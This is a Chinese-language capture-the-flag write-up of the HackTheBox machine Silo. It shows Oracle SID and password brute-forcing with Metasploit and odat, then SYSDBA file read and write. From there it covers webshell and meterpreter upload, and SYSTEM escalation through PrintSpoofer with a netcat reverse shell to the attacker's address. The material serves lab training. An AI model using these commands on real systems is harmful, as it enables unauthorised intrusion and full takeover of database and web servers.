HackTheBox Silo Writeup

Silo是HackTheBox上的Windows靶机，难度为Medium，是一个练习Oracle数据库和Windows提权的靶场。

靶场信息

靶场涉及到的一些技术：

• Windows探测
• Oracle数据库相关风险探测、漏洞利用
• Windows提权

信息收集

对Windows靶机的信息收集，目前来看我理解主要来源于端口扫描、enum4linux和SMB文件共享。

端口扫描

uzi@kali ~/D/06_Wordlists> nmap -n --min-rate 2000 -T4 -p- --max-retries 10 -Pn -sC -sV 10.129.196.225
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 23:30 CST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.33% done; ETC: 23:33 (0:00:08 remaining)
Nmap scan report for 10.129.196.225
Host is up (0.23s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   302:
|_    Message signing enabled but not required
|_clock-skew: mean: -3s, deviation: 0s, median: -4s
| smb2-time:
|   date: 2023-06-02T15:33:11
|_  start_date: 2023-06-02T15:27:59
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.69 seconds

端口扫描信息可以看到靶机环境开放了80端口、1521端口和一些其他端口，分别对应WEB服务和Oracle数据库。
PS：49159端口看描述也对应于Oracle数据库，但是没拿到啥信息。

WEB路径扫描

WEB路径扫描没有有用信息。

[####################] - 6m    270027/270027  0s      found:46      errors:0
[####################] - 3m     30000/30000   192/s   http://10.129.95.188/
[####################] - 3m     30000/30000   193/s   http://10.129.95.188/aspnet_client/
[####################] - 3m     30000/30000   191/s   http://10.129.95.188/Aspnet_client/
[####################] - 3m     30000/30000   187/s   http://10.129.95.188/aspnet_Client/
[####################] - 3m     30000/30000   178/s   http://10.129.95.188/aspnet_client/system_web/
[####################] - 3m     30000/30000   176/s   http://10.129.95.188/ASPNET_CLIENT/
[####################] - 3m     30000/30000   177/s   http://10.129.95.188/Aspnet_client/system_web/
[####################] - 3m     30000/30000   176/s   http://10.129.95.188/aspnet_Client/system_web/
[####################] - 3m     30000/30000   181/s   http://10.129.95.188/ASPNET_CLIENT/system_web/

enum4linux

enum4linux没有给出有用信息。

uzi@kali ~/D/0/feroxbuster> enum4linux 10.129.196.225
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun  2 23:30:50 2023

 =========================================( Target Information )=========================================

Target ........... 10.129.196.225
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.196.225 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 10.129.196.225 )===============================

Looking up status of 10.129.196.225
No reply from 10.129.196.225

 ==================================( Session Check on 10.129.196.225 )==================================


[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

SMB

SMB也没有不需要登录的共享文件夹。

uzi@kali ~/D/0/feroxbuster [1]> smbclient -L //10.129.196.225 -N
session setup failed: NT_STATUS_ACCESS_DENIED

Oracle数据库探测

Oracle数据库的探测、攻击参考了HackTricks上的教程，大概思路是：

1. 猜解SID
2. 猜解用户名、密码

猜解SID

使用auxiliary/scanner/oracle/sid_enum探测，未得到结果

msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show options

Module options (auxiliary/scanner/oracle/sid_enum):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    1521             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/oracle/sid_enum) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_enum) > run

[-] 10.129.95.188:1521    - TNS listener protected for 10.129.95.188...
[*] 10.129.95.188:1521    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

暴力破解SID，得到如下成功的SID：

msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show options

Module options (auxiliary/scanner/oracle/sid_brute):

   Name              Current Setting                                         Required  Description
   ----              ---------------                                         --------  -----------
   BRUTEFORCE_SPEED  5                                                       yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                   no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                   no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                   no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                                    no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   RHOSTS                                                                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             1521                                                    yes       The target port (TCP)
   SID                                                                       no        A specific SID to attempt.
   SID_FILE          /usr/share/metasploit-framework/data/wordlists/sid.txt  no        File containing instance names, one per line
   STOP_ON_SUCCESS   false                                                   yes       Stop guessing when a credential works for a host
   THREADS           1                                                       yes       The number of concurrent threads (max one per host)
   VERBOSE           true                                                    yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/oracle/sid_brute) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_brute) > run
...
[+] 10.129.196.225:1521   - 10.129.196.225:1521 Oracle - 'XE' is valid
[+] 10.129.196.225:1521   - 10.129.196.225:1521 Oracle - 'PLSEXTPROC' is valid
[+] 10.129.196.225:1521   - 10.129.196.225:1521 Oracle - 'CLREXTPROC' is valid
[+] 10.129.196.225:1521   - 10.129.196.225:1521 Oracle - '' is valid

猜解用户名、密码

对Oracle数据库猜解用户名、密码时，建议使用用户名和密码一一对应的字典，可以减少请求次数。
我个人实际测试下来看，下面几种方式实际猜解效果都不好：

• msf auxiliary/admin/oracle/oracle_login
• msf auxiliary/scanner/oracle/oracle_login
• nmap oracle-brute

使用odat进行口令爆破，实际也花了不少时间。

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py passwordguesser -s 10.129.95.188 -p 1521 -d XE

[1] (10.129.95.188:1521): Searching valid accounts on the 10.129.95.188 server, port 1521
The login cis has already been tested at least once. What do you want to do:            | ETA:  00:21:01
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password          | ETA:  00:21:39
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password          | ETA:  00:20:50
[!] Notice: 'dip' account is locked, so skipping this username for password             | ETA:  00:19:44
[!] Notice: 'hr' account is locked, so skipping this username for password              | ETA:  00:16:47
[!] Notice: 'mdsys' account is locked, so skipping this username for password           | ETA:  00:12:51
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password      | ETA:  00:10:03
[!] Notice: 'outln' account is locked, so skipping this username for password           | ETA:  00:09:01
[+] Valid credentials found: scott/tiger. Continue...                                   | ETA:  00:04:59
[!] Notice: 'system' account is locked, so skipping this username for password          | ETA:  00:03:59
[!] Notice: 'xdb' account is locked, so skipping this username for password#########    | ETA:  00:00:59
100% |##################################################################################| Time: 00:24:45
[+] Accounts found on 10.129.95.188:1521/sid:XE:
scott/tiger

Oracle数据库连接注意点

在HackTricks上的教程中包含了Oracle数据库命令执行相关操作，odat也有相应的功能。
我自己尝试时一直失败，后来查看这篇题解才发现使用odat时可以指定--sysdba参数，以SYSDBA权限连接。

以SYSDBA权限连接（指定--sysdba参数），可以读取靶机hosts文件：

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --getFile "C://windows/system32/drivers/etc" hosts /tmp/hosts1

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[+] Data stored in the hosts file sored in C://windows/system32/drivers/etc (copied in /tmp/hosts1 locally):
b"# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n#      102.54.94.97     rhino.acme.com          # source server\n#       38.25.63.10     x.acme.com              # x client host\n\n# localhost name resolution is handled within DNS itself.\n#\t127.0.0.1       localhost\n#\t::1             localhost\n"

不指定--sysdba参数，读取靶机hosts文件提示权限不足：

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE  --getFile "C://windows/system32/drivers/etc" hosts /tmp/hosts1

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[-] Impossible to read the ['C://windows/system32/drivers/etc', 'hosts', '/tmp/hosts1'] file: `ORA-01031: insufficient privileges`

初始权限

对于Windows服务器拿初始shell，按我原来打靶场的方式，一般来说时取得用户名和密码之后使用evil-winrm进行连接。
这个靶场的方式是，上传webshell到IIS文件目录，使用WEBshell进行。也可以生成meterpreter后门或者CS后门来上传、执行利用。

WEBshell

使用odat的文件处理模块上传WEBshell文件，通过浏览器利用。

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --putFile 'C:\Inetpub\wwwroot' a.aspx /usr/share/webshells/aspx/cmdasp.aspx --sysdba

[1] (10.129.95.188:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\Inetpub\wwwroot folder like a.aspx on the 10.129.95.188 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the a.aspx file

meterpreter

生成WEBshell：

msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows --arch x64 -e x64/xor -i 3  LHOST=10.10.14.29 LPORT=4444 -f exe -o a.exe

odat上传文件：

python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' a.exe /home/uzi/Documents/00-Learning/hackthebox/Machines/Silo/a.exe

msf监听：

msf6 auxiliary(admin/oracle/oracle_login) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > run

odat执行命令：

python ./odat.py externaltable -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --exec "C:/inetpub/wwwroot" "a.exe"

用户权限

WEBshell执行dir C:\Users\查看用户名是Phineas，可以直接查看user部分flag。

root权限

关于Windows的提权，可以参考HackTricks的Abusing Tokens
前面查看IIS的权限，发现有SeImpersonatePrivilege权限，可以直接提权，参考HackTricks的这篇文章。

上传PrintSpoofer和nc：

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' PrintSpoofer.exe /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe local file in the C:\Inetpub\wwwroot folder like PrintSpoofer.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the PrintSpoofer.exe file
(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' nc64.exe /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe local file in the C:\Inetpub\wwwroot folder like nc64.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the nc64.exe file

监听本地端口，在WEBshell里面执行命令提权：

WEBshell：
C:\inetpub\wwwroot\PrintSpoofer.exe -c "C:\inetpub\wwwroot\nc64.exe 10.10.14.29 9002 -e cmd"

本地监听端口：
uzi@kali ~/D/0/h/M/Silo> nc -lvnp 9002
Listening on 0.0.0.0 9002
Connection received on 10.129.95.188 49166
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

PS：本地监听端口时本来想用pwncat-cs，结果报错了，使用nc就没问题。
另，靶机环境提权部分给出了系统镜像，看题解是使用volatility的lsadump导出管理员账户登录密码信息。
另外题解也提到，因为oracle服务是SYSTEM权限运行的，所以可以直接使用odat查看root权限对应的flag文件。

总结

Silo靶场，我自己尝试攻击时猜解出密码，但没使用SYSDBA连接。
我从这个靶场里面学习到Oracle数据库利用相关知识，也深化了Windows提权的理解。